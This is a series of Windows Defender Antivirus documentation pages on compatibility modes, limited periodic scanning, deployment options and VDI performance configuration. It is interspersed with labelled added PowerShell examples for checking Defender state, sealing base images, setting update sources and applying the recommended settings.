limited protection feature, called limited periodic scanning.
If you are also using Windows Defender Advanced Threat Protection, then Windows Defender AV will enter
a passive mode.
The following matrix illustrates the states that Windows Defender AV will enter when third-party antivirus
products or Windows Defender ATP are also used.

WINDOWS VERSION | ANTIMALWARE PROTECTION OFFERED BY | ORGANIZATION ENROLLED IN WINDOWS DEFENDER ATP | WINDOWS DEFENDER AV STATE

Windows 10 | A third-party product that is not offered or developed by Microsoft | Yes | Passive mode

Windows 10 | A third-party product that is not offered or developed by Microsoft | No | Automatic disabled mode

Windows 10 | Windows Defender AV | Yes | Active mode

Windows 10 | Windows Defender AV | No | Active mode

Windows Server 2016 | A third-party product that is not offered or developed by Microsoft | Yes | Active mode (1)

Windows Server 2016 | A third-party product that is not offered or developed by Microsoft | No | Active mode (1)

Windows Server 2016 | Windows Defender AV | Yes | Active mode

Windows Server 2016 | Windows Defender AV | No | Active mode

(1) On Windows Server 2016, Windows Defender AV will not enter passive or disabled mode if you have
also installed a third-party antivirus product. If you install a third-party antivirus product, you should
uninstall Windows Defender AV on Windows Server 2016 to prevent problems caused by having multiple
antivirus products installed on a machine.
See the Windows Defender Antivirus on Windows Server 2016 topic for key differences and management
options for Windows Server installations.

IMPORTANT
Windows Defender AV is only available on endpoints running Windows 10 or Windows Server 2016.
In Windows 8.1 and Windows Server 2012, enterprise-level endpoint antivirus protection is offered as System Center
Endpoint Protection, which is managed through System Center Configuration Manager.
Windows Defender is also offered for consumer devices on Windows 8.1 and Windows Server 2012, although it does
not provide enterprise-level management (or an interface on Windows Server 2012 Server Core installations).

This table indicates the functionality and features that are available in each state:

(The original table also has columns for real-time protection and cloud-delivered protection, limited periodic scanning availability, file scanning and detection information, threat remediation, and Security intelligence updates; the per-state marks in those columns are not reproduced here.)

STATE | DESCRIPTION

Passive mode | Windows Defender AV will not be used as the antivirus app, and threats will not be remediated by Windows Defender AV. Files will be scanned and reports will be provided for threat detections which are shared with the Windows Defender ATP service.

Automatic disabled mode | Windows Defender AV will not be used as the antivirus app. Files will not be scanned and threats will not be remediated.

Active mode | Windows Defender AV is used as the antivirus app on the machine. All configuration made with Configuration Manager, Group Policy, Intune, or other management products will apply. Files will be scanned and threats remediated, and detection information will be reported in your configuration tool (such as Configuration Manager or the Windows Defender AV app on the machine itself).

If you are enrolled in Windows Defender ATP and you are using a third party antimalware product then
passive mode is enabled because the service requires common information sharing from the Windows
Defender AV service in order to properly monitor your devices and network for intrusion attempts and
attacks.
Automatic disabled mode is enabled so that if the protection offered by a third-party antivirus product
expires or otherwise stops providing real-time protection from viruses, malware or other threats, Windows
Defender AV will automatically enable itself to ensure antivirus protection is maintained on the endpoint. It
also allows you to enable limited periodic scanning, which uses the Windows Defender AV engine to
periodically check for threats in addition to your main antivirus app.
In passive and automatic disabled mode, you can still manage updates for Windows Defender AV, however
you can't move Windows Defender AV into the normal active mode if your endpoints have an up-to-date
third-party product providing real-time protection from malware.
If you uninstall the other product, and choose to use Windows Defender AV to provide protection to your
endpoints, Windows Defender AV will automatically return to its normal active mode.
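The matrix above can be checked on a machine by combining three facts: whether it is a client or a server edition, whether a non-Microsoft antivirus product is registered, and whether the Windows Defender ATP sensor service is present. The script below is an added example, not code from the Microsoft documentation. It assumes the Defender PowerShell module; it treats the presence of the Sense service as the sign of Windows Defender ATP enrollment (an assumption), and it does not query the SecurityCenter2 WMI namespace on server editions, where it does not exist, because the table's footnote already gives the answer there. The function name is an assumption.

```powershell
# Added example (not Microsoft documentation code): derive the expected
# Windows Defender AV state from the compatibility matrix above and compare
# it with what the engine reports. Assumes the Defender PowerShell module.

function Get-ExpectedDefenderAvState {
    $os = Get-CimInstance -ClassName Win32_OperatingSystem
    # ProductType: 1 = workstation, 2 = domain controller, 3 = server
    $isServer = ($os.ProductType -ne 1)

    # Windows Defender ATP enrollment installs the Sense service (assumption).
    $sense    = Get-Service -Name Sense -ErrorAction SilentlyContinue
    $enrolled = ($null -ne $sense)

    # Third-party AV products register in root/SecurityCenter2 on client editions.
    $thirdParty = @()
    if (-not $isServer) {
        $thirdParty = @(Get-CimInstance -Namespace 'root/SecurityCenter2' -ClassName AntiVirusProduct -ErrorAction SilentlyContinue |
            Where-Object { $_.displayName -notmatch 'Defender' } |
            Select-Object -ExpandProperty displayName)
    }

    # Rows of the matrix: server editions and machines without a third-party
    # product stay active; a third-party product gives passive mode when
    # enrolled in Windows Defender ATP and automatic disabled mode otherwise.
    $state = if ($isServer -or $thirdParty.Count -eq 0) { 'Active mode' }
             elseif ($enrolled) { 'Passive mode' }
             else { 'Automatic disabled mode' }

    $version = if ($isServer) { 'Windows Server' } else { 'Windows 10' }
    $tpList  = if ($thirdParty.Count) { $thirdParty -join ', ' } else { '(none registered)' }

    [pscustomobject]@{
        WindowsVersion       = $version
        ThirdPartyAV         = $tpList
        EnrolledInATP        = $enrolled
        ExpectedAvState      = $state
        # What the engine itself reports, for comparison with the expectation
        RealTimeProtectionOn = (Get-MpComputerStatus).RealTimeProtectionEnabled
    }
}

$r = Get-ExpectedDefenderAvState
$r | Format-List

if ($r.ExpectedAvState -eq 'Active mode' -and $r.RealTimeProtectionOn -eq $false) {
    Write-Warning 'Expected active mode but real-time protection is off; check the Real-time Protection policies.'
}
if ($r.WindowsVersion -eq 'Windows Server' -and $r.ThirdPartyAV -ne '(none registered)') {
    Write-Warning 'Windows Server does not enter passive mode; uninstall Windows Defender AV or the third-party product so two engines do not run together.'
}
```

A Windows 10 machine that reports a third-party product, no Sense service, and real-time protection still on is the case the section above describes: the third-party product has expired or stopped, and Windows Defender AV has re-enabled itself.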
WARNING
You should not attempt to disable, stop, or modify any of the associated services used by Windows Defender AV,
Windows Defender ATP, or the Windows Security app.
This includes the wscsvc, SecurityHealthService, MsSense, Sense, WinDefend, or MsMpEng services and process.
Manually modifying these services can cause severe instability on your endpoints and open your network to infections
and attacks.
It can also cause problems when using third-party antivirus apps and how their information is displayed in the
Windows Security app.

Related topics
Windows Defender Antivirus in Windows 10
Windows Defender Antivirus on Windows Server 2016
Use limited periodic scanning in Windows Defender
Antivirus
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Limited periodic scanning is a special type of threat detection and remediation that can be enabled when you have
installed another antivirus product on a Windows 10 device.
It can only be enabled in certain situations. See Windows Defender Antivirus compatibility for more information
on when limited periodic scanning can be enabled, and how Windows Defender Antivirus works with other AV
products.
Microsoft does not recommend using this feature in enterprise environments. This is a feature primarily
intended for consumers. This feature only uses a very limited subset of the Windows Defender Antivirus
capabilities to detect malware, and will not be able to detect most malware and potentially unwanted software.
Also, management and reporting capabilities will be limited. Microsoft recommends enterprises choose their
primary antivirus solution and use it exclusively.

How to enable limited periodic scanning


By default, Windows Defender Antivirus will enable itself on a Windows 10 device if there is no other antivirus
product installed, or if the other product is out-of-date, expired, or not working correctly.
If Windows Defender Antivirus is enabled, the usual options will appear to configure it on that device:
If another antivirus product is installed and working correctly, Windows Defender Antivirus will disable itself. The
Windows Security app will change the Virus & threat protection section to show status about the AV product,
and provide a link to the product's configuration options:
Underneath any 3rd party AV products, a new link will appear as Windows Defender Antivirus options.
Clicking this link will expand to show the toggle that enables limited periodic scanning.

Sliding the switch to On will show the standard Windows Defender AV options underneath the 3rd party AV
product. The limited periodic scanning option will appear at the bottom of the page.
Related topics
Configure behavioral, heuristic, and real-time protection
Windows Defender Antivirus in Windows 10
Deploy, manage, and report on Windows Defender
Antivirus
4/8/2019 • 4 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can deploy, manage, and report on Windows Defender Antivirus in a number of ways.
Because the Windows Defender Antivirus client is installed as a core part of Windows 10, traditional
deployment of a client to your endpoints does not apply.
However, in most cases you will still need to enable the protection service on your endpoints with Microsoft
Intune, System Center Configuration Manager, Azure Security Center, or Group Policy Objects, which is
described in the following table.
You'll also see additional links for:
Managing Windows Defender Antivirus protection, including managing product and protection updates
Reporting on Windows Defender Antivirus protection

IMPORTANT
In most cases, Windows 10 will disable Windows Defender Antivirus if it finds another antivirus product that is running
and up-to-date. You must disable or uninstall third-party antivirus products before Windows Defender Antivirus will
function. If you re-enable or install third-party antivirus products, then Windows 10 automatically disables Windows
Defender Antivirus.

Columns: TOOL; DEPLOYMENT OPTIONS (2); MANAGEMENT OPTIONS (NETWORK-WIDE CONFIGURATION AND POLICY OR BASELINE DEPLOYMENT) (3); REPORTING OPTIONS

Microsoft Intune
Deployment options (2): Add endpoint protection settings in Intune
Management options (3): Configure device restriction settings in Intune
Reporting options: Use the Intune console to manage devices

System Center Configuration Manager (1)
Deployment options (2): Use the Endpoint Protection point site system role and enable Endpoint Protection with custom client settings
Management options (3): With default and customized antimalware policies and client management
Reporting options: With the default Configuration Manager Monitoring workspace and email alerts

Group Policy and Active Directory (domain-joined)
Deployment options (2): Use a Group Policy Object to deploy configuration changes and ensure Windows Defender Antivirus is enabled.
Management options (3): Use Group Policy Objects (GPOs) to Configure update options for Windows Defender Antivirus and Configure Windows Defender features
Reporting options: Endpoint reporting is not available with Group Policy. You can generate a list of Group Policies to determine if any settings or policies are not applied

PowerShell
Deployment options (2): Deploy with Group Policy, System Center Configuration Manager, or manually on individual endpoints.
Management options (3): Use the Set-MpPreference and Update-MpSignature cmdlets available in the Defender module
Reporting options: Use the appropriate Get- cmdlets available in the Defender module

Windows Management Instrumentation
Deployment options (2): Deploy with Group Policy, System Center Configuration Manager, or manually on individual endpoints.
Management options (3): Use the Set method of the MSFT_MpPreference class and the Update method of the MSFT_MpSignature class
Reporting options: Use the MSFT_MpComputerStatus class and the get method of associated classes in the Windows Defender WMIv2 Provider

Microsoft Azure
Deployment options (2): Deploy Microsoft Antimalware for Azure in the Azure portal, by using Visual Studio virtual machine configuration, or using Azure PowerShell cmdlets. You can also Install Endpoint protection in Azure Security Center
Management options (3): Configure Microsoft Antimalware for Virtual Machines and Cloud Services with Azure PowerShell cmdlets or use code samples
Reporting options: Use Microsoft Antimalware for Virtual Machines and Cloud Services with Azure PowerShell cmdlets to enable monitoring. You can also review usage reports in Azure Active Directory to determine suspicious activity, including the Possibly infected devices report, and configure a SIEM tool to report on Windows Defender Antivirus events and add that tool as an app in AAD.

1. The availability of some functions and features, especially related to cloud-delivered protection, differ
between System Center Configuration Manager (Current Branch) and System Center Configuration
Manager 2012. In this library, we've focused on Windows 10, Windows Server 2016, and System
Center Configuration Manager (Current Branch). See Use Microsoft cloud-provided protection in
Windows Defender Antivirus for a table that describes the major differences. (Return to table)
2. In Windows 10, Windows Defender Antivirus is a component available without installation or
deployment of an additional client or service. It will automatically be enabled when third-party antivirus
products are either uninstalled or out of date (except on Windows Server 2016). Traditional deployment
therefore is not required. Deployment here refers to ensuring the Windows Defender Antivirus
component is available and enabled on endpoints or servers. (Return to table)
3. Configuration of features and protection, including configuring product and protection updates, are
further described in the Configure Windows Defender Antivirus features section in this library. (Return
to table)

In this section
TOPIC: Deploy and enable Windows Defender Antivirus protection
DESCRIPTION: While the client is installed as a core part of Windows 10, and traditional deployment does not apply, you will still need to enable the client on your endpoints with System Center Configuration Manager, Microsoft Intune, or Group Policy Objects.

TOPIC: Manage Windows Defender Antivirus updates and apply baselines
DESCRIPTION: There are two parts to updating Windows Defender Antivirus: updating the client on endpoints (product updates), and updating Security intelligence (protection updates). You can update Security intelligence in a number of ways, using System Center Configuration Manager, Group Policy, PowerShell, and WMI.

TOPIC: Monitor and report on Windows Defender Antivirus protection
DESCRIPTION: You can use Microsoft Intune, System Center Configuration Manager, the Update Compliance add-in for Microsoft Operations Management Suite, or a third-party SIEM product (by consuming Windows event logs) to monitor protection status and create reports about endpoint protection.
Deploy and enable Windows Defender Antivirus
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Depending on the management tool you are using, you may need to specifically enable or configure Windows
Defender Antivirus protection.
See the table in Deploy, manage, and report on Windows Defender Antivirus for instructions on how to enable
protection with Microsoft Intune, System Center Configuration Manager, Group Policy, Active Directory, Microsoft
Azure, PowerShell cmdlets, and Windows Management Instrumentation (WMI).
Some scenarios require additional guidance on how to successfully deploy or configure Windows Defender
Antivirus protection, such as Virtual Desktop Infrastructure (VDI) environments.
The remaining topic in this section provides end-to-end advice and best practices for setting up Windows
Defender Antivirus on virtual machines (VMs) in a VDI or Remote Desktop Services (RDS) environment.

Related topics
Windows Defender Antivirus in Windows 10
Deploy, manage updates, and report on Windows Defender Antivirus
Deployment guide for Windows Defender Antivirus in a virtual desktop infrastructure (VDI) environment
Deployment guide for Windows Defender Antivirus
in a virtual desktop infrastructure (VDI) environment
4/5/2019 • 13 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
In addition to standard on-premises or hardware configurations, you can also use Windows Defender Antivirus in
a remote desktop (RDS) or virtual desktop infrastructure (VDI) environment.
Boot storms can be a problem in large-scale VDIs; this guide will help reduce the overall network bandwidth and
performance impact on your hardware.

NOTE
We've recently introduced a new feature that helps reduce the network and CPU overhead on VMs when obtaining security
intelligence updates. If you'd like to test this feature before it's released generally, download the PDF guide for VDI
performance improvement testing.

We recommend setting the following when deploying Windows Defender Antivirus in a VDI environment:

LOCATION / SETTING / SUGGESTED CONFIGURATION

Client interface / Enable headless UI mode / Enabled

Client interface / Suppress all notifications / Enabled

Scan / Specify the scan type to use for a scheduled scan / Enabled - Quick

Root / Randomize scheduled task times / Enabled

Signature updates / Turn on scan after signature update / Enabled

Scan / Turn on catch up quick scan / Enabled

For more details on the best configuration options to ensure a good balance between performance and protection,
including detailed instructions for System Center Configuration Manager and Group Policy, see the Configure
endpoints for optimal performance section.
See the Microsoft Desktop virtualization site for more details on Microsoft Remote Desktop Services and VDI
support.
For Azure-based virtual machines, you can also review the Install Endpoint Protection in Azure Security Center
topic.
There are three main steps in this guide to help roll out Windows Defender Antivirus protection across your VDI:
1. Create and deploy the base image (for example, as a virtual hard disk (VHD)) that your virtual machines
(VMs) will use
2. Manage the base image and updates for your VMs
3. Configure the VMs for optimal protection and performance, including:
Randomize scheduled scans
Use quick scans
Prevent notifications
Disable scans from occurring after every update
Scan out-of-date machines or machines that have been offline for a while

IMPORTANT
While the VDI can be hosted on Windows Server 2012 or Windows Server 2016, the virtual machines (VMs) should be
running Windows 10, 1607 at a minimum, due to increased protection technologies and features that are unavailable in
earlier versions of Windows.

NOTE
When you manage Windows with System Center Configuration Manager, Windows Defender Antivirus protection will be
referred to as Endpoint Protection or System Center Endpoint Protection. See the Endpoint Protection section at the
Configuration Manager library for more information.

Create and deploy the base image


The main steps in this section include:
1. Create your standard base image according to your requirements
2. Apply Windows Defender AV protection updates to your base image
3. Seal or “lock” the image to create a “known-good” image
4. Deploy your image to your VMs
Create the base image
First, you should create your base image according to your business needs, applying or installing the relevant line
of business (LOB) apps and settings as you normally would. Typically, this would involve creating a VHD or
customized .iso, depending on how you will deploy the image to your VMs.
Apply protection updates to the base image
After creating the image, you should ensure it is fully updated. See Configure Windows Defender in Windows 10
for instructions on how to update Windows Defender Antivirus protection via WSUS, Microsoft Update, the
MMPC site, or UNC file shares. You should ensure that your initial base image is also fully patched with Microsoft
and Windows updates and patches.
Seal the base image
When the base image is fully updated, you should run a quick scan on the image.
After running a scan and building the cache, remove the machine GUID that uniquely identifies the device in
telemetry for both Windows Defender Antivirus and the Microsoft Security Removal Tool. This key is located here:
'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RemovalTools\MRT'
Remove the string found in the 'GUID' value.
This “sealing” or “locking” of the image helps Windows Defender Antivirus build a cache of known-good files and
avoid scanning them again on your VMs. In turn, this can help ensure performance on the VM is not impacted.
You can run a quick scan from the command line or via System Center Configuration Manager.

NOTE
Quick scan versus full scan
Quick scan looks at all the locations where there could be malware registered to start with the system, such as registry
keys and known Windows startup folders. Combined with our always-on real-time protection capability - which reviews files
when they are opened and closed, and whenever a user navigates to a folder - quick scan helps provide strong coverage both
for malware that starts with the system and kernel-level malware.
Therefore, when considering performance - especially for creating a new or updated image in preparation for deployment -
it makes sense to use a quick scan only. A full scan, however, can be useful on a VM that has encountered a malware threat
to identify if there are any inactive components lying around and help perform a thorough clean-up.
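The sealing steps above (apply protection updates, run a quick scan, remove the MRT GUID) as an added PowerShell example; this is not code from the original guide. It assumes an elevated session on the base image itself, and the one-day signature-age threshold is an illustrative assumption.

```powershell
# Added example: seal a VDI base image with the Defender module.
# Run once, elevated, on the base image before it is captured to a VHD.

$MrtKey = 'HKLM:\SOFTWARE\Microsoft\RemovalTools\MRT'

function Update-BaseImageProtection {
    # Step "Apply protection updates": bring Security intelligence fully up to date
    # so the quick scan below runs with the latest signatures.
    Update-MpSignature -ErrorAction Stop
    $status = Get-MpComputerStatus
    # Threshold of 1 day is an assumption; the point is to refuse to seal a stale image.
    if ($status.AntivirusSignatureAge -gt 1) {
        throw "Security intelligence is still $($status.AntivirusSignatureAge) day(s) old; check update sources before sealing."
    }
    $status.AntivirusSignatureVersion
}

function Invoke-BaseImageQuickScan {
    # Step "Seal the base image", part 1: the quick scan builds the known-good
    # file cache that every VM cloned from this image inherits.
    Start-MpScan -ScanType QuickScan -ErrorAction Stop
    (Get-MpComputerStatus).QuickScanEndTime
}

function Clear-MrtMachineGuid {
    # Step "Seal the base image", part 2: remove the per-device GUID so that
    # cloned VMs do not all report under the same telemetry identity.
    $guid = (Get-ItemProperty -Path $MrtKey -Name GUID -ErrorAction SilentlyContinue).GUID
    if ($guid) {
        Remove-ItemProperty -Path $MrtKey -Name GUID
        Write-Output "Removed MRT GUID $guid"
    }
    # Verify the value is really gone before the image is captured.
    $null -eq (Get-ItemProperty -Path $MrtKey -Name GUID -ErrorAction SilentlyContinue)
}

Write-Output "Signature version: $(Update-BaseImageProtection)"
Write-Output "Quick scan finished: $(Invoke-BaseImageQuickScan)"
if (-not (Clear-MrtMachineGuid)) { throw 'MRT GUID is still present; do not seal the image.' }
```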

Deploy the base image


You'll then need to deploy the base image across your VDI. For example, you can create or clone a VHD from your
base image, and then use that VHD when you create or start your VMs.
The following references provide ways you can create and deploy the base image across your VDI:
Single image management for Virtual Desktop Collections
Using Hyper-V to create a Base OS image that can be used for VMs and VHDs
Plan for Hyper-V security in Windows Server 2016
Create a virtual machine in Hyper-V (with a VHD)
Build Virtual Desktop templates

Manage your VMs and base image


How you manage your VDI will affect the performance impact of Windows Defender AV on your VMs and
infrastructure.
Because Windows Defender Antivirus downloads protection updates every day, or based on your protection
update settings, network bandwidth can be a problem if multiple VMs attempt to download updates at the same
time.
Following the guidelines in this guide means the VMs will only need to download "delta" updates, which are the
differences between an existing Security intelligence set and the next one. Delta updates are typically much
smaller (a few kilobytes) than a full Security intelligence download (which can average around 150 MB).
Manage updates for persistent VDIs
If you are using a persistent VDI, you should update the base image monthly, and set up protection updates to be
delivered daily via a file share, as follows:
1. Create a dedicated file share location on your network that can be accessed by your VMs and your VM host
(or other, persistent machine, such as a dedicated admin console that you use to manage your VMs).
2. Set up a scheduled task on your VM host to automatically download updates from the MMPC website or
Microsoft Update and save them to the file share (the SignatureDownloadCustomTask PowerShell script
can help with this).
3. Configure the VMs to pull protection updates from the file share.
4. Disable or delay automatic Microsoft updates on your VMs. See Update Windows 10 in the enterprise for
information on managing operating system updates with WSUS, SCCM, and others.
5. On or just after each Patch Tuesday (the second Tuesday of each month), update your base image with the
latest protection updates from the MMPC website, WSUS, or Microsoft Update. Also apply all other
Windows patches and fixes that were delivered on the Patch Tuesday. You can automate this by following
the instructions in Orchestrated offline VM Patching using Service Management Automation.
6. Run a quick scan on your base image before deploying it to your VMs.
A benefit to aligning your image update to the monthly Microsoft Update is that you ensure your VMs will have
the latest Windows security patches and other important Microsoft updates without each VM needing to
individually download them.
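Step 3 of the persistent-VDI procedure (configure the VMs to pull protection updates from the file share) as an added PowerShell example, not code from the original guide. The share path is a placeholder; the fallback order puts the share first so the VM only falls back to Microsoft Update or the MMPC when the share is unreachable.

```powershell
# Added example: point a VDI VM at the dedicated update share and verify it.
# Run elevated on each VM (or bake into the base image).

$UpdateShare = '\\vdi-updates.example.local\DefenderUpdates'   # placeholder share

function Set-VdiUpdateSource {
    param([Parameter(Mandatory)][string]$SharePath)

    # Fail early if the VM cannot reach the share; otherwise every VM would
    # silently fall back to a full download over the WAN during a boot storm.
    if (-not (Test-Path -Path $SharePath)) {
        throw "Update share $SharePath is not reachable from this VM."
    }

    # Sources are tried in the order listed. FileShares refers to the paths in
    # SignatureDefinitionUpdateFileSharesSources (several can be joined with '|').
    Set-MpPreference -SignatureDefinitionUpdateFileSharesSources $SharePath `
                     -SignatureFallbackOrder 'FileShares|MicrosoftUpdateServer|MMPC'
}

function Test-VdiUpdateSource {
    # Read back the effective configuration so the setting can be audited across VMs.
    $pref = Get-MpPreference
    [pscustomobject]@{
        Shares        = $pref.SignatureDefinitionUpdateFileSharesSources
        FallbackOrder = $pref.SignatureFallbackOrder
        FirstSource   = ($pref.SignatureFallbackOrder -split '\|')[0]
    }
}

Set-VdiUpdateSource -SharePath $UpdateShare
Test-VdiUpdateSource | Format-List

# Pull an update from the share right away to confirm it is actually used.
Update-MpSignature -UpdateSource FileShares
```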
Manage updates for non-persistent VDIs
If you are using a non-persistent VDI, you can update the base image daily (or nightly) and directly apply the latest
updates to the image.
An example:
1. Every night or other time when you can safely take your VMs offline, update your base image with the
latest protection updates from the MMPC website, WSUS, or Microsoft Update.
2. Run a quick scan on your base image before deploying it to your VMs.

Configure endpoints for optimal performance


There are a number of settings that can help ensure optimal performance on your VMs and VDI without affecting
the level of protection, including:
Randomize scheduled scans
Use quick scans
Prevent notifications
Disable scans from occurring after every update
Scan out-of-date machines or machines that have been offline for a while
These settings can be configured as part of creating your base image, or as a day-to-day management function of
your VDI infrastructure or network.
Randomize scheduled scans
Windows Defender Antivirus supports the randomization of scheduled scans and Security intelligence updates.
This can be extremely helpful in reducing boot storms (especially when used in conjunction with Disable scans
from occurring after every update and Scan out-of-date machines or machines that have been offline for a while).
Scheduled scans run in addition to real-time protection and scanning.
The start time of the scan itself is still based on the scheduled scan policy – ScheduleDay, ScheduleTime,
ScheduleQuickScanTime.
Use Group Policy to randomize scheduled scan start times:
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender and configure the following setting:
Double-click Randomize scheduled task times and set the option to Enabled. Click OK. This adds a
true randomization (it is still random if the disk image is replicated) of plus or minus 30 minutes (using
all of the intervals) to the start of the scheduled scan and the Security intelligence update. For example, if
the schedule start time was set at 2.30pm, then enabling this setting could cause one machine to scan
and update at 2.33pm and another machine to scan and update at 2.14pm.
Use Configuration Manager to randomize scheduled scans:
See How to create and deploy antimalware policies: Advanced settings for details on configuring System Center
Configuration Manager (current branch).
See Schedule scans for other configuration options available for scheduled scans.
Use quick scans
You can specify the type of scan that should be performed during a scheduled scan. Quick scans are the preferred
approach as they are designed to look in all places where malware needs to reside to be active.
Use Group Policy to specify the type of scheduled scan:
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender > Scan and configure the following
setting:
Double-click Specify the scan type to use for a scheduled scan and set the option to Enabled and
Quick scan. Click OK.
Use Configuration Manager to specify the type of scheduled scan:
See How to create and deploy antimalware policies: Scheduled scans settings for details on configuring System
Center Configuration Manager (current branch).
See Schedule scans for other configuration options available for scheduled scans.
Prevent notifications
Sometimes, Windows Defender Antivirus notifications may be sent to or persist across multiple sessions. In order
to minimize this problem, you can lock down the Windows Defender Antivirus user interface.
Use Group Policy to hide notifications:
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender > Client Interface and configure the
following settings:
Double-click Suppress all notifications and set the option to Enabled. Click OK. This prevents
notifications from Windows Defender AV appearing in the action center on Windows 10 when scans or
remediation is performed.
Double-click Enable headless UI mode and set the option to Enabled. Click OK. This hides the entire
Windows Defender AV user interface from users.
Use Configuration Manager to hide notifications:
1. On your System Center Configuration Manager console, open the antimalware policy you want to change
(click Assets and Compliance in the navigation pane on the left, then expand the tree to Overview >
Endpoint Protection > Antimalware Policies)
2. Go to the Advanced section and configure the following settings:
a. Set Disable the client user interface to Yes. This hides the entire Windows Defender AV user
interface.
b. Set Show notifications messages on the client computer... to Yes. This hides notifications from
appearing.
c. Click OK.
3. Deploy the updated policy as usual.
Disable scans after an update
This setting will prevent a scan from occurring after receiving an update. You can apply this when creating the
base image if you have also run a quick scan. This prevents the newly updated VM from performing a scan again
(as you've already scanned it when you created the base image).

IMPORTANT
Running scans after an update will help ensure your VMs are protected with the latest Security intelligence updates.
Disabling this option will reduce the protection level of your VMs and should only be used when first creating or deploying
the base image.

Use Group Policy to disable scans after an update:


1. On your Group Policy management computer, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender > Signature Updates and configure
the following setting:
Double-click Turn on scan after signature update and set the option to Disabled. Click OK. This
prevents a scan from running immediately after an update.
Use Configuration Manager to disable scans after an update:
1. On your System Center Configuration Manager console, open the antimalware policy you want to change
(click Assets and Compliance in the navigation pane on the left, then expand the tree to Overview >
Endpoint Protection > Antimalware Policies)
2. Go to the Scheduled scans section and configure the following setting:
3. Set Check for the latest Security intelligence updates before running a scan to No. This prevents a
scan after an update.
4. Click OK.
5. Deploy the updated policy as usual.
Scan VMs that have been offline
This setting will help ensure protection for a VM that has been offline for some time or has otherwise missed a
scheduled scan.
Use Group Policy to enable a catch-up scan:
1. On your Group Policy management machine, open the Group Policy Management Console, right-click the
Group Policy Object you want to configure and click Edit.
2. In the Group Policy Management Editor go to Computer configuration.
3. Click Policies then Administrative templates.
4. Expand the tree to Windows components > Windows Defender > Scan and configure the following
setting:
5. Double-click the Turn on catch-up quick scan setting and set the option to Enabled. Click OK. This
forces a scan if the VM has missed two or more consecutive scheduled scans.
Use Configuration Manager to enable a catch-up scan:
1. On your System Center Configuration Manager console, open the antimalware policy you want to change
(click Assets and Compliance in the navigation pane on the left, then expand the tree to Overview >
Endpoint Protection > Antimalware Policies)
2. Go to the Scheduled scans section and configure the following setting:
3. Set Force a scan of the selected scan type if client computer is offline during... to Yes. This forces a
scan if the VM has missed two or more consecutive scheduled scans.
4. Click OK.
5. Deploy the updated policy as usual.
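The whole "Configure endpoints for optimal performance" section (and the suggested-configuration table earlier in this guide) as an added PowerShell example that applies the settings with the Defender module and then reports any drift; it is not code from the original guide. The two settings that have no Set-MpPreference parameter are written as policy registry values, and those value names are an assumption to verify against the Windows Defender ADMX before use.

```powershell
# Added example: apply and verify the VDI performance settings.
# Run elevated; equivalent to the Group Policy / Configuration Manager steps above.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'

function Set-VdiDefenderSettings {
    # Headless UI, quick scheduled scans, randomized task times, catch-up quick scan.
    Set-MpPreference -UILockdown $true `
                     -ScanParameters QuickScan `
                     -RandomizeScheduleTaskTimes $true `
                     -DisableCatchupQuickScan $false

    # ASSUMED policy value names (check the ADMX):
    #   UX Configuration\Notification_Suppress = 1 -> "Suppress all notifications" Enabled
    #   Signature Updates\DisableScanOnUpdate  = 1 -> "Turn on scan after signature update" Disabled
    $policies = @(
        @{ Key = "$PolicyRoot\UX Configuration";  Name = 'Notification_Suppress'; Value = 1 },
        @{ Key = "$PolicyRoot\Signature Updates"; Name = 'DisableScanOnUpdate';   Value = 1 }
    )
    foreach ($p in $policies) {
        if (-not (Test-Path $p.Key)) { New-Item -Path $p.Key -Force | Out-Null }
        Set-ItemProperty -Path $p.Key -Name $p.Name -Value $p.Value -Type DWord
    }
}

function Test-VdiDefenderSettings {
    # Compare effective preferences with the suggested configuration and return
    # only the settings that drift, so the output is empty when compliant.
    $pref = Get-MpPreference
    $expected = [ordered]@{
        UILockdown                 = $true
        ScanParameters             = 1        # 1 = Quick scan, 2 = Full scan
        RandomizeScheduleTaskTimes = $true
        DisableCatchupQuickScan    = $false   # $false means catch-up quick scan is ON
    }
    foreach ($name in $expected.Keys) {
        $actual = $pref.$name
        if ($actual -ne $expected[$name]) {
            [pscustomobject]@{ Setting = $name; Expected = $expected[$name]; Actual = $actual }
        }
    }
}

Set-VdiDefenderSettings
$drift = @(Test-VdiDefenderSettings)
if ($drift.Count -gt 0) { $drift | Format-Table -AutoSize } else { 'VDI settings applied as suggested.' }
```

Note that a GPO setting the same preferences wins over Set-MpPreference, so drift reported here on a domain-joined VM usually points at a conflicting policy rather than a failed cmdlet.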
Exclusions
On Windows Server 2016, Windows Defender Antivirus will automatically deliver the right exclusions for servers
running a VDI environment. However, if you are running an older Windows server version, you can refer to the
exclusions that are applied on this page:
Configure Windows Defender Antivirus exclusions on Windows Server

Additional resources
Video: Microsoft Senior Program Manager Bryan Keller on how System Center Configuration Manager 2012
manages VDI and integrates with App-V
TechNet forums on Remote Desktop Services and VDI
SignatureDownloadCustomTask PowerShell script
Report on Windows Defender Antivirus
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
There are a number of ways you can review protection status and alerts, depending on the management tool you
are using for Windows Defender Antivirus.
You can use System Center Configuration Manager to monitor Windows Defender Antivirus or create email alerts,
or you can also monitor protection using Microsoft Intune.
Microsoft Operations Management Suite has an Update Compliance add-in that reports on key Windows
Defender Antivirus issues, including protection updates and real-time protection settings.
